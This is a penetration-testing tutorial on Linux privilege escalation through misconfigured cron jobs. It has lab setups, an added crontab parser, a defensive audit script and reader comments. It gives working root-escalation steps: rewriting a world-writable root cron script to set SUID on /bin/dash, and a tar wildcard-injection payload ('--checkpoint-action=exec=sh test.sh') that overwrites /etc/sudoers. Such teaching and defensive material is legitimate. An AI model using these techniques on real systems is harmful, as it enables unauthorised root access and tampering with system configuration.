Linux Privilege Escalation by Exploiting Cronjobs
After solving several OSCP-style challenges, we decided to write up the various methods used for Linux privilege escalation, which could be helpful to our readers in their penetration testing projects. In this article we will learn privilege escalation by exploiting cron jobs to gain root access on a remote host, and also examine how a badly implemented cron job leads to privilege escalation. If you have solved post-exploitation CTF challenges, then by reading this article you will recognise the loopholes that lead to privilege escalation.
For details, you can read our previous articles where we applied this trick for privilege escalation. Open the links given below:
Link1: Hack the Box Challenge: Europa Walkthrough
Link2: Hack the Milnet VM (CTF Challenge)
Table of Contents
- Introduction
- Cron job
- Crontab syntax
- Crontab File overwrite
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
- Crontab Tar wildcard Injection
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
Let’s Start!!!
What is a cron job?
Cron jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They are most commonly used for sysadmin jobs such as backups or cleaning out the /tmp/ directory. Cron reads its schedule from crontab files; the system-wide crontab is the file /etc/crontab inside the /etc directory.
For example, the following crontab entry empties the Apache error log at one minute past every hour (the five leading fields are minute, hour, day of month, month and day of week):
1 * * * * printf "" > /var/log/apache/error_log
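To make the field syntax concrete, here is an added Python example (not from the original article) that expands the five crontab time fields and counts how often an entry fires in a day, so entries such as 1 0 * * *, 1 * * * *, 2 * * * * and */2 * * * * can be compared directly. The function names and the constructed sample date are assumptions of this example, not anything cron itself provides.

```python
"""Expand crontab time fields and check when an entry fires.

Added example: the names below are this example's own, not cron's API.
"""
from datetime import datetime

# Allowed value range of each field, in crontab order:
# minute, hour, day-of-month, month, day-of-week (0 or 7 = Sunday).
FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]


def expand_field(spec, lo, hi):
    """Return the set of integers one crontab field matches.

    Supports '*', 'n', 'a-b', comma-separated lists of those, and a
    '/step' suffix on '*' or on a range ('*/2' means every second value).
    """
    values = set()
    for part in spec.split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if rng == "*":
            start, end = lo, hi
        elif "-" in rng:
            start, end = (int(x) for x in rng.split("-", 1))
        else:
            # A bare number means exactly that value: '2' in the minute
            # field is minute 2 of each hour, not "every 2 minutes".
            start = end = int(rng)
        if not lo <= start <= end <= hi or step < 1:
            raise ValueError(f"field {spec!r} is outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    if hi == 7 and 7 in values:          # normalise Sunday to 0
        values.discard(7)
        values.add(0)
    return values


def parse_schedule(entry):
    """Expand the five leading time fields of a crontab line."""
    fields = entry.split()[:5]
    if len(fields) != 5:
        raise ValueError("a crontab entry needs five time fields")
    return [expand_field(f, lo, hi) for f, (lo, hi) in zip(fields, FIELD_RANGES)]


def fires_at(entry, when):
    """True if the entry's schedule runs at the minute given by `when`."""
    minute, hour, dom, month, dow = parse_schedule(entry)
    dom_spec, dow_spec = entry.split()[2], entry.split()[4]
    dom_ok = when.day in dom
    dow_ok = when.isoweekday() % 7 in dow   # isoweekday: Mon=1 .. Sun=7
    # Vixie cron: if both day fields are restricted, either one matching
    # is enough; otherwise both must match (the '*' side always does).
    if dom_spec != "*" and dow_spec != "*":
        day_ok = dom_ok or dow_ok
    else:
        day_ok = dom_ok and dow_ok
    return (when.minute in minute and when.hour in hour
            and when.month in month and day_ok)


def runs_per_day(entry, year, month, day):
    """Count how many minutes of the given calendar day the entry fires on."""
    return sum(
        fires_at(entry, datetime(year, month, day, h, m))
        for h in range(24)
        for m in range(60)
    )


if __name__ == "__main__":
    # Constructed sample date for the demo.
    for entry in ("1 0 * * *", "1 * * * *", "2 * * * *", "*/2 * * * *"):
        print(f"{entry:14} fires {runs_per_day(entry, 2024, 1, 1)} times per day")
```

Running it shows that 1 0 * * * fires once a day (at 00:01), 1 * * * * and 2 * * * * fire 24 times a day (once per hour), and */2 * * * * fires 720 times, i.e. every two minutes.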
Crontab File overwrite
Lab Setup for the Poorly configured cron job
Objective: set a new job with the help of crontab that runs a Python script to erase all data inside a particular directory.
Let's assume “cleanup” is the directory whose data will be cleared automatically every two minutes. So we save some data inside /home/cleanup.
mkdir cleanup
cd cleanup
echo "hello friends" > 1.txt
echo "ALL files will be deleted in 2 mints" > 2.txt
echo > 1.php
echo > 2.php
ls
As you can observe from the given image some files are stored inside the cleanup directory.
Now write a Python program in another directory to delete the contents of /home/cleanup, and give it full permissions (chmod 777, i.e. writable by every user; this is the misconfiguration the exploitation below relies on).
cd /tmp
nano cleanup.py
#!/usr/bin/env python
import os
import sys
try:
    # Remove everything inside the cleanup directory (shell glob expansion).
    os.system('rm -r /home/cleanup/* ')
except:
    sys.exit()
chmod 777 cleanup.py
Finally, schedule a task with the help of crontab to run cleanup.py as root every 2 minutes.
nano /etc/crontab
*/2 * * * * root /tmp/cleanup.py
Now let's verify our objective:
chmod 777 cleanup.py
cd /home/cleanup
ls
date
ls
date
Cool!! It is working: as you can see, all files have been deleted after two minutes.
Post Exploitation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I have successfully logged in to the victim's machine through SSH and have a non-root user terminal. Execute the following commands as shown below.
cat /etc/crontab
ls -al /tmp/cleanup.py
cat /tmp/cleanup.py
From the above steps we notice that the crontab runs a Python script every two minutes as root, and that the script is writable by every user. Now let's exploit it.
There are many ways to gain root access from here; in this method we set the SUID bit on /bin/dash. It is quite simple: open the file in an editor, for example nano cleanup.py, and replace the line os.system('rm -r /home/cleanup/* ') with the following:
os.system('chmod u+s /bin/dash')
After two minutes the job sets the SUID bit on /bin/dash, and when you run it you get a root shell.
/bin/dash
id
whoami
Awesome!! We hit the goal!
Crontab Tar Wildcard Injection
Lab Setup
Objective: schedule a task with the help of crontab to take a backup of the html directory with the tar archiving program.
The directory whose backup you are going to take must be writable by the low-privileged user.
Now schedule a task with the help of crontab to run the tar archiving program every minute, backing up /var/www/html into /var/backups. The job changes into the directory and archives a bare *, which the shell expands into file names relative to that directory (an absolute-path glob such as /var/www/html/* would hand tar paths beginning with /, which it never treats as options).
nano /etc/crontab
*/1 * * * * root cd /var/www/html && tar -zcf /var/backups/html.tgz *
Let's verify that the schedule is working by executing the following commands.
cd /var/backups
ls
date
From the image below you can see that the html.tgz file was generated after 1 minute.
Post Exploitation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I have successfully logged in to the victim's machine through SSH and have a non-root user terminal. Then open the crontab to see whether any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled the tar archiving program every minute, and we know that this cron job runs as root. Let's try to exploit it.
Execute the following commands to grant sudo rights to the logged-in user; this post-exploitation technique is known as wildcard injection, because tar parses a file name that begins with -- as a command-line option.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
After 1 minute it grants sudo rights to the user ignite, as you can confirm from the image below.
sudo -l
sudo bash
whoami
YUPPIEEEE!!! We have successfully obtained root access.
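The two lab jobs above share one root cause: root runs something an unprivileged user can influence, either the script file itself (the world-writable cleanup.py) or the arguments to tar (a bare * expanded by the shell into file names that tar reads as options). The following Python script is an added example, not part of the original article, that audits /etc/crontab-style text for both conditions. The function names, the constructed SAMPLE_CRONTAB lines and the temporary demo file are assumptions of this example. The hardened forms it accepts are a script that is not group- or world-writable (a root-owned file with mode 755) and a tar job that either names the directory explicitly or puts -- before the glob.

```python
"""Audit /etc/crontab-style entries for the two weaknesses in the article.

Added example: parser and check names are this example's own.
"""
import os
import re
import shlex
import stat
import tempfile

# Constructed crontab text for the demo. The first two jobs mirror the
# article's lab jobs; the last two are hardened tar jobs the audit accepts.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/2 * * * * root /tmp/cleanup.py
*/1 * * * * root cd /var/www/html && tar -zcf /var/backups/html.tgz *
0 3 * * * root cd /var/www/html && tar -zcf /var/backups/html.tgz -- *
0 4 * * * root tar -zcf /var/backups/html.tgz /var/www/html
"""


def parse_system_crontab(text):
    """Yield (user, command) for every job line; skip comments and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, 6)   # five time fields, user, command
        if len(parts) == 7:
            yield parts[5], parts[6]


def split_commands(command):
    """Split a shell command line on ;  &&  ||  | into simple commands."""
    return [c.strip() for c in re.split(r"&&|\|\||[;|]", command) if c.strip()]


def writable_by_others(path):
    """True if `path` is a regular file that group or others may write to.
    The article's chmod 777 cleanup.py is exactly this case."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return stat.S_ISREG(mode) and bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def unsafe_tar_glob(simple_cmd):
    """True if a tar command passes a bare glob the shell may expand into
    names such as --checkpoint=1, which tar then parses as options.
    Accepted forms: an explicit path, or '--' before the glob."""
    argv = shlex.split(simple_cmd)
    if not argv or os.path.basename(argv[0]) != "tar" or "--" in argv:
        return False
    return any(arg.startswith("*") for arg in argv[1:])


def audit(text):
    """Return (command, reason) findings for each risky job in `text`."""
    findings = []
    for user, command in parse_system_crontab(text):
        for simple in split_commands(command):
            # Every absolute path in the command is a candidate script/binary.
            for token in shlex.split(simple):
                if token.startswith("/") and writable_by_others(token):
                    findings.append((command,
                        f"{token} is writable by non-owners but runs as {user}"))
            if unsafe_tar_glob(simple):
                findings.append((command,
                    "tar receives a bare '*' glob; use '--' or an explicit path"))
    return findings


def demo_writable_script():
    """Create a constructed world-writable script in a temp dir (the same
    mistake as chmod 777 cleanup.py) and return its path."""
    path = os.path.join(tempfile.mkdtemp(), "cleanup.py")
    with open(path, "w") as fh:
        fh.write("#!/usr/bin/env python3\n")
    os.chmod(path, 0o777)
    return path


if __name__ == "__main__":
    script = demo_writable_script()
    for cmd, why in audit(SAMPLE_CRONTAB + f"*/2 * * * * root {script}\n"):
        print(f"{cmd}\n    -> {why}")
```

Run as a normal user it reports the tar job that archives a bare * and any scheduled script that other users can edit; the -- and explicit-path variants produce no finding. The check only covers system crontabs with a user field (/etc/crontab and /etc/cron.d/*), since per-user crontabs run as their owner and have no user column.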
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here
It would be good, along with the exploitation, if you put the patch or the solution.
Nice article!
I’ve got two doubts:
1. In the very first example, does the Apache logs get generated every minute or every hour?
2. What is the significance of the asterisk and a forward slash before the number of minutes in the crontab file? Why do we have to write “*/2” instead of just “2” for running a task every 2 minutes?
nice [aarti-{cles}]
We found that this aarti{cles} only mentions the cron job with a user field? Please add the one without a user.